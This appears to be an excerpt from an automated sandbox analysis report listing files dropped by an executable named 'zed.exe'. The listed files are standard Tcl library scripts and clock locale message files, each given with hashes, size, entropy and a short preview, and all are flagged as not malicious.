                                                                                                                                                                                                                                            MD5:8609B624CD3EC63DD02DBF89455C3A9B
                                                                                                                                                                                                                                            SHA1:B3E1843E34C38AA668FFDDF435A1A65D55449CA0
                                                                                                                                                                                                                                            SHA-256:5123DB837EADF45712EA7D449BC40BFD3E8E16D3D71E7D0CE9A32F164973D767
                                                                                                                                                                                                                                            SHA-512:B20B75473F34209888F38EE570B8A96061760E88466DFC2EC55C814968DC7F67D92D255E8635188B60455B88F2D1D517747613AD0F366D60412D2D6ECE231B0E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# history.tcl --..#..# Implementation of the history command...#..# Copyright (c) 1997 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution of..# this file, and for a DISCLAIMER OF ALL WARRANTIES...#.....# The tcl::history array holds the history list and some additional..# bookkeeping variables...#..# nextid.the index used for the next history list item...# keep..the max size of the history list..# oldest.the index of the oldest item in the history.....namespace eval ::tcl {.. variable history.. if {![info exists history]} {...array set history {... nextid.0... keep.20... oldest.-20...}.. }.... namespace ensemble create -command ::tcl::history -map {...add.::tcl::HistAdd...change.::tcl::HistChange...clear.::tcl::HistClear...event.::tcl::HistEvent...info.::tcl::HistInfo...keep.::tcl::HistKeep...nextid.::tcl::HistNextID...redo.::tcl::HistRedo.. }..}.....# history --..#..#.This is the main history command. See the
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):10066
                                                                                                                                                                                                                                            Entropy (8bit):4.806771544139381
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:kipkqA3KsZMAikGJ4kIWPa95KTBoF7dg/8YNkgQ4id:TkqWKsZ8kGJ4kIWPaDFzTd
                                                                                                                                                                                                                                            MD5:C2092F8CA2D761DFA8C461076D956374
                                                                                                                                                                                                                                            SHA1:90B4648B3BC81C30465B0BE83A5DB4127A1392FB
                                                                                                                                                                                                                                            SHA-256:8C474095A3ABA7DF5B488F3D35240D6DE729E57153980C2A898728B8C407A727
                                                                                                                                                                                                                                            SHA-512:09CE408886E2CEADDF70786A15D63AF9A930E70CAC4286AC9DDD2094C8EDCF97A2ADC2D3D2659B123F88719340D3B00D9F96E9BC7C8B55192735C290E7D24683
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# http.tcl..# Client-side HTTP for GET, POST, and HEAD commands...# These routines can be used in untrusted code that uses the Safesock..# security policy...# These procedures use a callback interface to avoid using vwait,..# which is not defined in the safe base...#..# See the http.n man page for documentation....package provide http 1.0....array set http {.. -accept */*.. -proxyhost {}.. -proxyport {}.. -useragent {Tcl http client package 1.0}.. -proxyfilter httpProxyRequired..}..proc http_config {args} {.. global http.. set options [lsort [array names http -*]].. set usage [join $options ", "].. if {[llength $args] == 0} {...set result {}...foreach name $options {... lappend result $name $http($name)...}...return $result.. }.. regsub -all -- - $options {} options.. set pat ^-([join $options |])$.. if {[llength $args] == 1} {...set flag [lindex $args 0]...if {[regexp -- $pat $flag]} {... return $http($flag)...} else {... return -code er
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):746
                                                                                                                                                                                                                                            Entropy (8bit):4.711041943572035
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:jHx5XRsLzhjJS42wbGlTULuUAZb3KykszLl7+HkuRz20JSv6C3l5kMn:bHRsRJS42wbGlTUcZ+yk2Lli1z2jxXkM
                                                                                                                                                                                                                                            MD5:A387908E2FE9D84704C2E47A7F6E9BC5
                                                                                                                                                                                                                                            SHA1:F3C08B3540033A54A59CB3B207E351303C9E29C6
                                                                                                                                                                                                                                            SHA-256:77265723959C092897C2449C5B7768CA72D0EFCD8C505BDDBB7A84F6AA401339
                                                                                                                                                                                                                                            SHA-512:7AC804D23E72E40E7B5532332B4A8D8446C6447BB79B4FE32402B13836079D348998EA0659802AB0065896D4F3C06F5866C6B0D90BF448F53E803D8C243BBC63
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Tcl package index file, version 1.0..# This file is generated by the "pkg_mkIndex" command..# and sourced either when an application starts up or..# by a "package unknown" script. It invokes the..# "package ifneeded" command to set up package-related..# information so that packages will be loaded automatically..# in response to "package require" commands. When this..# script is sourced, the variable $dir must contain the..# full path name of this file's directory.....package ifneeded http 1.0 [list tclPkgSetup $dir http 1.0 {{http.tcl source {httpCopyDone httpCopyStart httpEof httpEvent httpFinish httpMapReply httpProxyRequired http_code http_config http_data http_formatQuery http_get http_reset http_size http_status http_wait}}}]..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):25633
                                                                                                                                                                                                                                            Entropy (8bit):4.885492991636381
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:cXugPHudKlExBG+Xg3Qonlm6ofRRECLSQDjr5vkhzx/i:hgGdKli4eonlm6offLzehNi
                                                                                                                                                                                                                                            MD5:FE92C81BB4ACDDA00761C695344D5F1E
                                                                                                                                                                                                                                            SHA1:A87E1516FBD1F9751EC590273925CBC5284B16BD
                                                                                                                                                                                                                                            SHA-256:7A103A85413988456C2AD615C879BBCB4D91435BCFBBE23393E0EB52B56AF6E2
                                                                                                                                                                                                                                            SHA-512:C983076E420614D12AB2A7342F6F74DD5DCDAD21C7C547F660E73B74B3BE487A560ABD73213DF3F58BE3D9DBD061A12D2956CA85A58D7B9D9E40D9FA6E6C25EB
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# init.tcl --..#..# Default system startup file for Tcl-based applications. Defines..# "unknown" procedure and auto-load facilities...#..# Copyright (c) 1991-1993 The Regents of the University of California...# Copyright (c) 1994-1996 Sun Microsystems, Inc...# Copyright (c) 1998-1999 Scriptics Corporation...# Copyright (c) 2004 Kevin B. Kenny. All rights reserved...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....# This test intentionally written in pre-7.5 Tcl..if {[info commands package] == ""} {.. error "version mismatch: library\nscripts expect Tcl version 7.5b1 or later but the loaded version is\nonly [info patchlevel]"..}..package require -exact Tcl 8.6.13....# Compute the auto path to use in this interpreter...# The values on the path come from several locations:..#..# The environment variable TCLLIBPATH..#..# tcl_library, which is the directory containing this init.tcl script...# [t
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1038
                                                                                                                                                                                                                                            Entropy (8bit):4.10054496357204
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:4EnLB383Hcm0hH9BncmtR7tK9dUVxMmALfpKIdzVJLd3xfjTuLM+vzkHWZ6tH9H0:4aR838HH9ekCkMmEfpK2xx2jiWZ0VbY
                                                                                                                                                                                                                                            MD5:DA8BA1C3041998F5644382A329C3C867
                                                                                                                                                                                                                                            SHA1:CA0BD787A51AD9EDC02EDD679EEEEB3A2932E189
                                                                                                                                                                                                                                            SHA-256:A1EACA556BC0CFBD219376287C72D9DBBFAB76ECF9BF204FD02D40D341BAF7DA
                                                                                                                                                                                                                                            SHA-512:4F086396405FDFE7FBDA7614D143DE9DB41F75BDBD3DB18B1EE9517C3DCCED238DD240B4B64829FD04E50F602DBF371D42A321D04C4C48E4B8B2A067CA1BAF2E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset af DAYS_OF_WEEK_ABBREV [list \.. "So"\.. "Ma"\.. "Di"\.. "Wo"\.. "Do"\.. "Vr"\.. "Sa"].. ::msgcat::mcset af DAYS_OF_WEEK_FULL [list \.. "Sondag"\.. "Maandag"\.. "Dinsdag"\.. "Woensdag"\.. "Donderdag"\.. "Vrydag"\.. "Saterdag"].. ::msgcat::mcset af MONTHS_ABBREV [list \.. "Jan"\.. "Feb"\.. "Mar"\.. "Apr"\.. "Mei"\.. "Jun"\.. "Jul"\.. "Aug"\.. "Sep"\.. "Okt"\.. "Nov"\.. "Des"\.. ""].. ::msgcat::mcset af MONTHS_FULL [list \.. "Januarie"\.. "Februarie"\.. "Maart"\.. "April"\.. "Mei"\.. "Junie"\.. "Julie"\.. "Augustus"\.. "September"\.. "Oktober"\.. "November"\.. "Desember"\.. ""].. ::msgcat::mcset af AM "VM
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):257
                                                                                                                                                                                                                                            Entropy (8bit):4.925537696653838
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xouFygMouFqF3v6ay/5ouFy9+3vR6HyFvn:4EnLB383RAgeYF3v6ay/RAI3voSVn
                                                                                                                                                                                                                                            MD5:1B9DCD1C6FCDDC95AE820EA8DA5E15B8
                                                                                                                                                                                                                                            SHA1:E8160353FD415BAB9FD5ACCA14E087C5E6AE836E
                                                                                                                                                                                                                                            SHA-256:1548988458BBF0DFCCC23B7487CEC0E9C64E4CC8E045723E50BEC37C454A8C81
                                                                                                                                                                                                                                            SHA-512:532AF060B95AED5E381B161BE56BC88D91A8F3DF2ACFD835491991F99FE752ADB4A3F93AB6D4E68F7042C28A3C1DD87A6312DFD9FFFAFD6ECE3F1B76837C5B7F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset af_ZA DATE_FORMAT "%d %B %Y".. ::msgcat::mcset af_ZA TIME_FORMAT_12 "%l:%M:%S %P".. ::msgcat::mcset af_ZA DATE_TIME_FORMAT "%d %B %Y %l:%M:%S %P %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2018
                                                                                                                                                                                                                                            Entropy (8bit):4.477377447232708
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83gr/fsS/Sm8p4M/n1KsPktE30AiJcAxi9CEzdEvSCHvMSV:43UkiSm8p3nX0EzdCSCPV
                                                                                                                                                                                                                                            MD5:D264D01B46D96455715114CAEDF9F05E
                                                                                                                                                                                                                                            SHA1:A3F68A4C6E69433BD53E52B73041575F3B3AC3F2
                                                                                                                                                                                                                                            SHA-256:B69D0061A728D59F89FF8621312789CD9F540BF2E2ED297804D22F6278561D85
                                                                                                                                                                                                                                            SHA-512:A4163DAA6821B293EADD5D499E0641A8B7C93180C710D6B364AE8681A8FF6F35EC948C8DDBE960A8466AF1ACABC15B0D465A08B084617E8005D708459F7E74D3
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ar DAYS_OF_WEEK_ABBREV [list \.. "\u062d"\.. "\u0646"\.. "\u062b"\.. "\u0631"\.. "\u062e"\.. "\u062c"\.. "\u0633"].. ::msgcat::mcset ar DAYS_OF_WEEK_FULL [list \.. "\u0627\u0644\u0623\u062d\u062f"\.. "\u0627\u0644\u0627\u062b\u0646\u064a\u0646"\.. "\u0627\u0644\u062b\u0644\u0627\u062b\u0627\u0621"\.. "\u0627\u0644\u0623\u0631\u0628\u0639\u0627\u0621"\.. "\u0627\u0644\u062e\u0645\u064a\u0633"\.. "\u0627\u0644\u062c\u0645\u0639\u0629"\.. "\u0627\u0644\u0633\u0628\u062a"].. ::msgcat::mcset ar MONTHS_ABBREV [list \.. "\u064a\u0646\u0627"\.. "\u0641\u0628\u0631"\.. "\u0645\u0627\u0631"\.. "\u0623\u0628\u0631"\.. "\u0645\u0627\u064a"\.. "\u064a\u0648\u0646"\.. "\u064a\u0648\u0644"\.. "\u0623\u063a\u0633"\.. "\u0633\u0628\u062a"\..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):265
                                                                                                                                                                                                                                            Entropy (8bit):4.872222510420193
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xoKNvfcoKU3v6xyFjoKNo+3vfXM68vn:4EnLB3831vfD3v6g9F3vfc6+n
                                                                                                                                                                                                                                            MD5:430498B4AB1E77C86BC1311A49747581
                                                                                                                                                                                                                                            SHA1:684EAD965D9010C2A6E73DCACB2224FDE585F9FF
                                                                                                                                                                                                                                            SHA-256:2E04B96DA002519D28125918A22FF2BB9659A668A7BCAD34D85DDDECEC8DC0B4
                                                                                                                                                                                                                                            SHA-512:9F85A88A383DCFC54DAA6253D94C307A14B1CC91D5C97AF817B8122AF98025AB2430D0B2D656EBED09E78FB854D1F9CF99F3B791A6ECB7834112012739140126
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ar_IN DATE_FORMAT "%A %d %B %Y".. ::msgcat::mcset ar_IN TIME_FORMAT_12 "%I:%M:%S %z".. ::msgcat::mcset ar_IN DATE_TIME_FORMAT "%A %d %B %Y %I:%M:%S %z %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1851
                                                                                                                                                                                                                                            Entropy (8bit):4.08645484776227
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83sxS/Sm819+es/Ii/R91bpH0+U0c+es/Ii/R91bpH0+UO:43wiSm815MbJbHgMbJbp
                                                                                                                                                                                                                                            MD5:5C62D606F4F14BC8994B28F9622D70DD
                                                                                                                                                                                                                                            SHA1:E99F8CC5D330085545B05B69213E9D011D436990
                                                                                                                                                                                                                                            SHA-256:5ADBB3D37C3369E5FC80D6A462C82598D5A22FAEF0E8DF6B3148231D2C6A7F73
                                                                                                                                                                                                                                            SHA-512:81AC9200459B0896E27A028BD089A174F7F921B0367BC8FF1AB33D3E561417B6F8EC23DAB750ECB408AC8A11CDFDBFA4F890F9E723BB8607B017C9FEE00928A0
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ar_JO DAYS_OF_WEEK_ABBREV [list \.. "\u0627\u0644\u0623\u062d\u062f"\.. "\u0627\u0644\u0627\u062b\u0646\u064a\u0646"\.. "\u0627\u0644\u062b\u0644\u0627\u062b\u0627\u0621"\.. "\u0627\u0644\u0623\u0631\u0628\u0639\u0627\u0621"\.. "\u0627\u0644\u062e\u0645\u064a\u0633"\.. "\u0627\u0644\u062c\u0645\u0639\u0629"\.. "\u0627\u0644\u0633\u0628\u062a"].. ::msgcat::mcset ar_JO MONTHS_ABBREV [list \.. "\u0643\u0627\u0646\u0648\u0646 \u0627\u0644\u062b\u0627\u0646\u064a"\.. "\u0634\u0628\u0627\u0637"\.. "\u0622\u0630\u0627\u0631"\.. "\u0646\u064a\u0633\u0627\u0646"\.. "\u0646\u0648\u0627\u0631"\.. "\u062d\u0632\u064a\u0631\u0627\u0646"\.. "\u062a\u0645\u0648\u0632"\.. "\u0622\u0628"\.. "\u0623\u064a\u0644\u0648\u0644"\.. "\u062a\u0634\u0631\u064a\u0646 \u0627\u0644\u0623\u0648\u064
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1851
                                                                                                                                                                                                                                            Entropy (8bit):4.083347689510237
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83LxS/Sm8S9+es/Ii/R91bpH0+U/c+es/Ii/R91bpH0+UO:431iSm8S5MbJbQgMbJbp
                                                                                                                                                                                                                                            MD5:6FC1CC738207E2F8E0871103841BC0D4
                                                                                                                                                                                                                                            SHA1:D2C62C7F6DA1EF399FCBE2BA91C9562C87E6152F
                                                                                                                                                                                                                                            SHA-256:1FC13070CF661488E90FECE84274C46B1F4CC7E1565EAB8F829CCAA65108DFCA
                                                                                                                                                                                                                                            SHA-512:E547D5CBB746654051AFDA21942075BC2224C2FF75D440C6C34C642AD24CF622E520FF919B8BD4AFC0116D9CE69B3ABA4E81EE247C1388F3C5741150201F5C60
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ar_LB DAYS_OF_WEEK_ABBREV [list \.. "\u0627\u0644\u0623\u062d\u062f"\.. "\u0627\u0644\u0627\u062b\u0646\u064a\u0646"\.. "\u0627\u0644\u062b\u0644\u0627\u062b\u0627\u0621"\.. "\u0627\u0644\u0623\u0631\u0628\u0639\u0627\u0621"\.. "\u0627\u0644\u062e\u0645\u064a\u0633"\.. "\u0627\u0644\u062c\u0645\u0639\u0629"\.. "\u0627\u0644\u0633\u0628\u062a"].. ::msgcat::mcset ar_LB MONTHS_ABBREV [list \.. "\u0643\u0627\u0646\u0648\u0646 \u0627\u0644\u062b\u0627\u0646\u064a"\.. "\u0634\u0628\u0627\u0637"\.. "\u0622\u0630\u0627\u0631"\.. "\u0646\u064a\u0633\u0627\u0646"\.. "\u0646\u0648\u0627\u0631"\.. "\u062d\u0632\u064a\u0631\u0627\u0646"\.. "\u062a\u0645\u0648\u0632"\.. "\u0622\u0628"\.. "\u0623\u064a\u0644\u0648\u0644"\.. "\u062a\u0634\u0631\u064a\u0646 \u0627\u0644\u0623\u0648\u064
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1851
                                                                                                                                                                                                                                            Entropy (8bit):4.084701680556524
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83lxS/Sm8M9+es/Ii/R91bpH0+UBc+es/Iv/I91bpH0+UO:43LiSm8M5MbJbSgMo0bp
                                                                                                                                                                                                                                            MD5:8188C37CA44FEFFF8D895AAD503AD4F6
                                                                                                                                                                                                                                            SHA1:C48F2E3B9FC055704D2DAFDC67E9D08EE6897D45
                                                                                                                                                                                                                                            SHA-256:294F3E46C55453EDAD44567E1330F9B43E69A07FA0655B24DD2780A4490C1194
                                                                                                                                                                                                                                            SHA-512:F86FCFC7C460473D46C472041AB2E1F9388CF34BCA9050295D1DAE454E35A2A0320D0C61D5E8CBB832AF74FFDD1A7511AF32EA2A53B481F39A1CBCF5F086D514
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ar_SY DAYS_OF_WEEK_ABBREV [list \.. "\u0627\u0644\u0623\u062d\u062f"\.. "\u0627\u0644\u0627\u062b\u0646\u064a\u0646"\.. "\u0627\u0644\u062b\u0644\u0627\u062b\u0627\u0621"\.. "\u0627\u0644\u0623\u0631\u0628\u0639\u0627\u0621"\.. "\u0627\u0644\u062e\u0645\u064a\u0633"\.. "\u0627\u0644\u062c\u0645\u0639\u0629"\.. "\u0627\u0644\u0633\u0628\u062a"].. ::msgcat::mcset ar_SY MONTHS_ABBREV [list \.. "\u0643\u0627\u0646\u0648\u0646 \u0627\u0644\u062b\u0627\u0646\u064a"\.. "\u0634\u0628\u0627\u0637"\.. "\u0622\u0630\u0627\u0631"\.. "\u0646\u064a\u0633\u0627\u0646"\.. "\u0646\u0648\u0627\u0631"\.. "\u062d\u0632\u064a\u0631\u0627\u0646"\.. "\u062a\u0645\u0648\u0632"\.. "\u0622\u0628"\.. "\u0623\u064a\u0644\u0648\u0644"\.. "\u062a\u0634\u0631\u064a\u0646 \u0627\u0644\u0623\u0648\u064
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2157
                                                                                                                                                                                                                                            Entropy (8bit):4.27810535662921
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:43PI8IKQGQ8mA/XxQJxQnA9QJlPyI/tbCaQICMIcQ8InVI5tNIzQFIQQLtChjsI4:2PItK5BSb9ajfycCW5IzdQNxK
                                                                                                                                                                                                                                            MD5:6334BDDFC1E0EAE4DBB2C90F85818FD8
                                                                                                                                                                                                                                            SHA1:085EDC3D027D6B5A6A6A2561717EA89C8F8B8B39
                                                                                                                                                                                                                                            SHA-256:A636A82C7D00CCDC0AF2496043FFA320F17B0D48A1232708810D3BB1453E881E
                                                                                                                                                                                                                                            SHA-512:18ADB77314FCFD534E55B234B3A53A0BC572AB60B80D099D2F3B20E0C5FE66179FDC076AA43200DB3CA123BC6216989EC41448FA624D3BA9633413AD8AD6034C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset be DAYS_OF_WEEK_ABBREV [list \.. "\u043d\u0434"\.. "\u043f\u043d"\.. "\u0430\u0442"\.. "\u0441\u0440"\.. "\u0447\u0446"\.. "\u043f\u0442"\.. "\u0441\u0431"].. ::msgcat::mcset be DAYS_OF_WEEK_FULL [list \.. "\u043d\u044f\u0434\u0437\u0435\u043b\u044f"\.. "\u043f\u0430\u043d\u044f\u0434\u0437\u0435\u043b\u0430\u043a"\.. "\u0430\u045e\u0442\u043e\u0440\u0430\u043a"\.. "\u0441\u0435\u0440\u0430\u0434\u0430"\.. "\u0447\u0430\u0446\u0432\u0435\u0440"\.. "\u043f\u044f\u0442\u043d\u0456\u0446\u0430"\.. "\u0441\u0443\u0431\u043e\u0442\u0430"].. ::msgcat::mcset be MONTHS_ABBREV [list \.. "\u0441\u0442\u0434"\.. "\u043b\u044e\u0442"\.. "\u0441\u043a\u0432"\.. "\u043a\u0440\u0441"\.. "\u043c\u0430\u0439"\.. "\u0447\u0440\u0432"\.. "\u043b\u043f\u043d"
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1871
                                                                                                                                                                                                                                            Entropy (8bit):4.4251657008559935
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:43EUAIlnQf/QVdQ81mnEZqEavWQEQ3QvQrQL0QjQTtQDCQSY4tqP:27xMk+nEZqE3biIYbUi+C9y
                                                                                                                                                                                                                                            MD5:E5225D6478C60E2502D18698BB917677
                                                                                                                                                                                                                                            SHA1:52D611CB5351FB873D2535246B3A3C1A37094023
                                                                                                                                                                                                                                            SHA-256:CFE4E44A3A751F113847667EC9EA741E762BBDE0D4284822CB337DF0F92C1ACA
                                                                                                                                                                                                                                            SHA-512:59AB167177101088057BF4EE0F70262987A2177ECB72C613CCAAE2F3E8D8B77F07D15DA5BE3B8728E23C31A1C9736030AA4036A8CD00A24791751A298B3A88B3
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset bg DAYS_OF_WEEK_ABBREV [list \.. "\u041d\u0434"\.. "\u041f\u043d"\.. "\u0412\u0442"\.. "\u0421\u0440"\.. "\u0427\u0442"\.. "\u041f\u0442"\.. "\u0421\u0431"].. ::msgcat::mcset bg DAYS_OF_WEEK_FULL [list \.. "\u041d\u0435\u0434\u0435\u043b\u044f"\.. "\u041f\u043e\u043d\u0435\u0434\u0435\u043b\u043d\u0438\u043a"\.. "\u0412\u0442\u043e\u0440\u043d\u0438\u043a"\.. "\u0421\u0440\u044f\u0434\u0430"\.. "\u0427\u0435\u0442\u0432\u044a\u0440\u0442\u044a\u043a"\.. "\u041f\u0435\u0442\u044a\u043a"\.. "\u0421\u044a\u0431\u043e\u0442\u0430"].. ::msgcat::mcset bg MONTHS_ABBREV [list \.. "I"\.. "II"\.. "III"\.. "IV"\.. "V"\.. "VI"\.. "VII"\.. "VIII"\.. "IX"\.. "X"\.. "XI"\.. "XII"\.. ""].. ::msgcat::mcset bg MO
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2335
                                                                                                                                                                                                                                            Entropy (8bit):4.107102006297273
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR835e/MWrD//6HFEVcVVcCVcTUTVckVEVcT7VcEEVcby/Vcn0VcMr/0VcM8VcQ:43ktX++QalMObalMZ6IE6V
                                                                                                                                                                                                                                            MD5:5D25E7FC65824AC987535FEA14A4045C
                                                                                                                                                                                                                                            SHA1:85C10F05823CD3263FC7B3EC38796BEC261B3716
                                                                                                                                                                                                                                            SHA-256:890EA6521DEB1B3C3913CCD92562F6360E064DAEE2E2B0356A6DD97A46264A1F
                                                                                                                                                                                                                                            SHA-512:5D8A88ACAEBBF3CD721F288FA0F1FEE517EE568CA5482E30CFA1E36CD37DF011C449090E2D9041F1D046A191F13D4C5C4B6F9E2F16FD259E63CE46ECC4E4F81F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset bn DAYS_OF_WEEK_ABBREV [list \.. "\u09b0\u09ac\u09bf"\.. "\u09b8\u09cb\u09ae"\.. "\u09ae\u0999\u0997\u09b2"\.. "\u09ac\u09c1\u09a7"\.. "\u09ac\u09c3\u09b9\u09b8\u09cd\u09aa\u09a4\u09bf"\.. "\u09b6\u09c1\u0995\u09cd\u09b0"\.. "\u09b6\u09a8\u09bf"].. ::msgcat::mcset bn DAYS_OF_WEEK_FULL [list \.. "\u09b0\u09ac\u09bf\u09ac\u09be\u09b0"\.. "\u09b8\u09cb\u09ae\u09ac\u09be\u09b0"\.. "\u09ae\u0999\u0997\u09b2\u09ac\u09be\u09b0"\.. "\u09ac\u09c1\u09a7\u09ac\u09be\u09b0"\.. "\u09ac\u09c3\u09b9\u09b8\u09cd\u09aa\u09a4\u09bf\u09ac\u09be\u09b0"\.. "\u09b6\u09c1\u0995\u09cd\u09b0\u09ac\u09be\u09b0"\.. "\u09b6\u09a8\u09bf\u09ac\u09be\u09b0"].. ::msgcat::mcset bn MONTHS_ABBREV [list \.. "\u099c\u09be\u09a8\u09c1\u09df\u09be\u09b0\u09c0"\.. "\u09ab\u09c7\u09ac\u09cd\u09b0\u09c1\u09df\u09be
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):265
                                                                                                                                                                                                                                            Entropy (8bit):4.868201122972066
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xovtvfluo/E3v6xyFjovto+3vflm68vn:4EnLB383UtvfltE3v6g8tF3vflm6+n
                                                                                                                                                                                                                                            MD5:B91BB2ABC23B90962D2070B9588F2AB5
                                                                                                                                                                                                                                            SHA1:CBB4E9CD600773792C6E9F3E6B27E99C1846B44F
                                                                                                                                                                                                                                            SHA-256:B3D8A4632290B0F3DA690E47C1FDF06A8B9E171A96E938AFDB0DD52CF806CE54
                                                                                                                                                                                                                                            SHA-512:932FC4B8C3CA72731187D56012AD7DD7777C4D447F16EEB17B9D68235C9590DF99992FD22B8D7C85A843A610F93CD36FAFA993C34C441255A1C0A93C73BC5FE4
                                                                                                                                                                                                                                            Malicious:false
